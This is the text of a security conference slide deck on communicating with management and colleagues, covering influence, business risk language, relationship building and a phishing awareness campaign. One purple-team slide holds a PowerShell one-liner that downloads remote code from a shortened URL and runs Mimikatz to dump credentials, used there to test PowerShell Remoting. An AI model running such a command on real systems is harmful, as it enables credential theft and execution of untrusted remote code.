@haydnjohnson
Communication to
Upper Management
& Colleauges
The Art of Influence
@haydnjohnson
Whoami
Haydn Johnson
Security Manager| Purple Teamer
Points (points.com)
@haydnjohnson
Talks: Bsides, Circle City Con, SecTor, NolaCon
Kitty, Gym, BJJ
http://www.slideshare.net/HaydnJohnson
@haydnjohnson
Obligatory kitty photo!
@haydnjohnson
I work here!
@haydnjohnson
1.
Outline
give a summary of (something).
@haydnjohnson
Outline
❏ Why this talk
❏ Communication
Problem
❏ Politics
❏ Influence
❏ Relationship
Building
❏ Examples
@haydnjohnson
2.
How|Why This Talk
Some background
@haydnjohnson
A long time ago
Pentesting | Big 4 consulting
@haydnjohnson
Consulting vs Internal
1 2 3 4
?????
4 weeks
Forever
@haydnjohnson
What I do
Job Title: Security Manager
Responsibilities: Everything Security
Threat Intelligence Network Security
Security Program SDLC
Logging & Monitoring Employee
Security Awareness Web Security
Questions …...
@haydnjohnson
What I do
Number of direct reports : 0
ME
@haydnjohnson
Number of Security staff
@haydnjohnson
In Reality
OPs Team Windows Team
DBA Team Sysadmins
@haydnjohnson
I had to gain support from teams that had no
obligation to help.
❏ No goals
❏ Security responsibility only in my Job Description
In Short
@haydnjohnson
@haydnjohnson
Some Struggles
@haydnjohnson
Some Struggles
I’m not a silver bullet
❏ I don’t know everything
❏ Busy
❏ Not Seen as authority figure - initially
❏ Dev experience lacking
@haydnjohnson
Struggles
I'm not as technical as I thought
❏ Developers asking about websockets / encryption
“Let me do some investigation and get back to you ” /
Aka let me Google that
Was not sure where to start
❏ I wanted to do everything
❏ So many goals
❏ Taking on too much
@haydnjohnson
2.
Question Time
Audience Participation plzkthx
@haydnjohnson
Which is preferred
❏ Says hello every morning
❏ Asks how you are
❏ Remembers personal
information
❏ Ensures you understand
tasks
❏ Rushes straight to their
desk
❏ Does not ask questions
❏ Micromanges
❏ Flips you email of list
Can you work late tonight?
@haydnjohnson
Security has a Communication
Problem
❏ Management does not
care
❏ I told them X months ago
but didn’t listen
❏ Pentest was short
❏ It just does not work
that way
❏ What is the boss
thinking
❏ Thats not a pentest
I still struggle with these
@haydnjohnson
3.
Communication
Problem Example
@haydnjohnson
Security has a Communication
Problem
Pop Calc Example
@haydnjohnson
Kind of correct!
This is what an exec thinks
Security has a Communication
Problem
@haydnjohnson
Not paid
Not Fixed Sad Pandas
Consequences
Security has a Communication
Problem
@haydnjohnson
Security has a Communication
Problem
Leads to:
Not Aligned Frustration Running
around
@haydnjohnson
Kind of correct!
This is what an exec thinks
Security has a Communication
Problem
@haydnjohnson
What was not explained:
❏ Popping calcutor is an EXAMPLE of controlling
code
So what?
❏ Someone can control that computer
So what?
❏ Someone is in your network
❏ Access to Data
So what?
Security has a Communication
Problem
@haydnjohnson
What could be improved?
@haydnjohnson
Speak their language
❏ How does this impact them?
❏ Money
❏ Reputation
❏ Down time
❏ Fines
❏ Loss of customers
Benefits
❏ Executives understand
❏ Fixing happens
❏ Less frustration for all
Security has a Communication
Problem
@haydnjohnson
4.
Why is there a
Communication
Problem?
What’s a business
@haydnjohnson
“Different Context
@haydnjohnson
@haydnjohnson
@haydnjohnson
@haydnjohnson
Business Context
Big Wigs
@haydnjohnson
Business Context
Hacking
@haydnjohnson
Business Context
Profits
@haydnjohnson
Business Context
Magic ProfitExecutives
@haydnjohnson
Business Context
Security Costs Money
@haydnjohnson
Business Context
Security Costs Time & Effort
@haydnjohnson
Business Context
It Won ‘t Happen to Us
@haydnjohnson
Business Context
Basically
@haydnjohnson
So what can we do?
@haydnjohnson
Breaking the Status Quo
Security is seen as a
Cost
Need to show how
much a compromise
would cost
Security is time and
effort we don’t want
Amount of dollars to
protect $company
Legislation
Reputation
Won’t happen to us Statistics
News headlines
Assume Breach
@haydnjohnson
If Secuirty is seen in negative
ways
How do we fix this?
@haydnjohnson
How do we have an impact?
Politics
Influence
@haydnjohnson
Politics
@haydnjohnson
3.
Politics
Is just relationships
@haydnjohnson
“Your Organization is MUCH more
political than most of us realize.
https://www.manager-tools.com/2012/12/rules-politics-chapter-one
-count-your-votes
@haydnjohnson
“Non-rational decision Making
https://www.manager-tools.com/2012/12/rules-politics-chapter-one
-count-your-votes
@haydnjohnson
Politics
Think of it as Relationship Effects
“Professional Life is HUMAN life, and that means
it's emotional, and therefore political.”
https://www.manager-tools.com/2012/12/rules-politics-chapter-one
-count-your-votes
@haydnjohnson
Politics
Think of it as Relationship Effects
❏ In order to get what I want, I have to give them
what they want
❏ Give and take
@haydnjohnson
How can you ‘play’ politics
better?
@haydnjohnson
3.
Influence
A process for having an effect
@haydnjohnson
If someone influences someone else, they are
changing a person or thing in an indirect but
important way.
This way
What is Influence
@haydnjohnson
Big 4 Example
@haydnjohnson
Why Influence
❏ Reach Goals
❏ Effect change
❏ Having input that matters
❏ Being appreciated
❏ Necessary tool in organizational life
@haydnjohnson
Why Influence
What could that mean for me:
❏ The extra tool you
needed
❏ Career development
❏ Bigger project
❏ Exploitation
❏ Fixes approved
❏ Help from other
teams
❏ Time to tune tools
❏ Changing a process
@haydnjohnson
Why Influence
Most importantly
You are not doing this:
@haydnjohnson
How to Influence
❏ Speak Business Language
❏ Communicate in Risk, Dollars and cents
❏ Relationship Building
@haydnjohnson
How to Influence
Business Language
❏ Business Reputation
❏ Customer / Client Reputation
❏ Market and Strategy
❏ How do we stack against other companies
❏ Compliance
❏ Technology is not the driving force
@haydnjohnson
How to Influence
Metrics
❏ High, Medium, Low
❏ How long does it take to remediate?
❏ What are they rated on?
@haydnjohnson
How to Influence
Risks, dollars and cents
❏ What is the risk, so what?
❏ Dollar spent for each dollar protected
❏ Best practices
@haydnjohnson
How to Influence
Meetings
❏ Agenda / Description
❏ Prepare beforehand
❏ Start and finsh on time
@haydnjohnson
If you can't present. Your ideas
cant be heard
https://www.manager-tools.com/2012/12/rules-politics-chapter-one-count-your-vot
es
@haydnjohnson
3.
Relationship
Building over
“Zero Dayz”
@haydnjohnson
@haydnjohnson
Technical Skills are Fantastic
Your exploit code is amazing
Your detection algorithm is on point
@haydnjohnson
Relationship Building
Tech + Soft Skills == Career zero day
❏ Networking == more opportunities
What you do and know can reach more people
@haydnjohnson
What does it mean?
People Skills / Soft Skills
❏ Thinking outside the self
❏ Communicating clearly
❏ Empathy
@haydnjohnson
What does that really mean?
Influence
❏ How can I get the most out of this interaction to
benefit security?
❏ How can I speak in their language?
❏ What mood are they in?
@haydnjohnson
@haydnjohnson
Examples - Risk Register
Risk Register
❏ Why a Risk Register?
❏ What value will it add?
❏ Speak Business
@haydnjohnson
Examples - Risk Register
Risk Register
❏ To track risks, accountability
❏ Potential damage / cost / impact
❏ Metrics
@haydnjohnson
Examples - Risk Register
How did I approach
❏ Placing in Jira
I want to create this, that has a goal of...
How can you help me?
Is there a different way?
@haydnjohnson
Examples - Risk Register
The result
❏ A whole workflow created in a test environment
❏ People love to help if you look at them as the expert
❏ More than just what I wanted included
❏ Things included audibility and tracking
❏ Metrics for the business
@haydnjohnson
Examples - Mistakes
Admitting them
❏ Hard
❏ Necessary
❏ Cultivates a great environment
@haydnjohnson
What I find works
@haydnjohnson
Solutions that worked for me
Relationship Building
& Influence
❏ Not claiming the sky
is falling
❏ Transparency
❏ Listening for a
response
Why does it work?
❏ No boy who cried
wolf
❏ Integrity
❏ They will feel valued,
more likely to help
@haydnjohnson
Solutions that worked for me
Coffee with the CFO Example
❏ Present to CFO/CTO fortnightly
Fear usingFear
❏ Fear should not be the tool for security
@haydnjohnson
Solutions that worked for me
Security is not just code
❏ People
❏ Process
❏ Technology
Code is written by people. Code is pushed via a
process. Code is hosted on technology
@haydnjohnson
6.
Example exercise
Purple Team
@haydnjohnson
PowerShell Remoting
Mimikatz
@haydnjohnson
Credentials in Memory
Helpdesk / Ops wants a secure way to remotely
manage workstation(s).
RDP | VNC - no thanks
Want to use PowerShell Remoting because easier and
‘secure’
https://blog.netspi.com/powershell-remoting-cheatsheet/
@haydnjohnson
Credentials in Memory
Requirements
❏ Ease of use
❏ Secure
❏ Auditability
Research shows this is possible
@haydnjohnson
Credentials in Memory
Steps:
○ Before PS-Remoting ○ After PS-Remoting
@haydnjohnson
Credentials in Memory
❏ Need to know for sure
❏ Want to test credentials are safe
❏ See for self
Mimikatz comes in
@haydnjohnson
Credentials in Memory
Command Run:
powershell "IEX (New-Object
Net.WebClient).DownloadString('http://is.gd/oeoFuI');
Invoke-Mimikatz -DumpCreds | Out-File pre.txt”
http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-pa
sswords-with.html
@haydnjohnson
Credentials in Memory
Dumping credentials
@haydnjohnson
Credentials in Memory
Compare
@haydnjohnson
Credentials in Memory
Thumbs up success gift] / image
@haydnjohnson
Credentials in Memory
Success!
❏ Need to document
❏ Have justification to Implement!
❏ Security Gives sign off!
@haydnjohnson
Conclusion
@haydnjohnson
Top Takeaways
We are all in this together
Soft skills will take you far
@haydnjohnson
Mentoring
@haydnjohnson
Questions, Comments, Ask away
@haydnjohnson
Time Bonus
@haydnjohnson
Phishing Awareness Campaign
Not textbook execution
❏ Was not focused on click rate or credentials
❏ Exciting - allowed rumours to spread
❏ People talked about it with each other
@haydnjohnson
Phishing Awareness Campaign
Goals for $company
❏ Know to contact me for $security
❏ Have security at front of mind
❏ Understand phishing scams
@haydnjohnson
Phishing - sucks
@haydnjohnson
Awareness “Training”
@haydnjohnson
All the lolcats
@haydnjohnson
Everyone can be phished, even
me
@haydnjohnson
Phishing Awareness Campaign
Training was not training
❏ 30min awareness session
❏ Lolcats & jokes
❏ Graphs for team results
@haydnjohnson
Phishing Awareness Campaign
Visibility as Security
❏ Everyone knew my name
❏ People approached me with their story
@haydnjohnson
Phishing Awareness Campaign
@haydnjohnson
Top Takeaways
We are all in this together
Soft skills will take you far

Communication hack fest-2018-final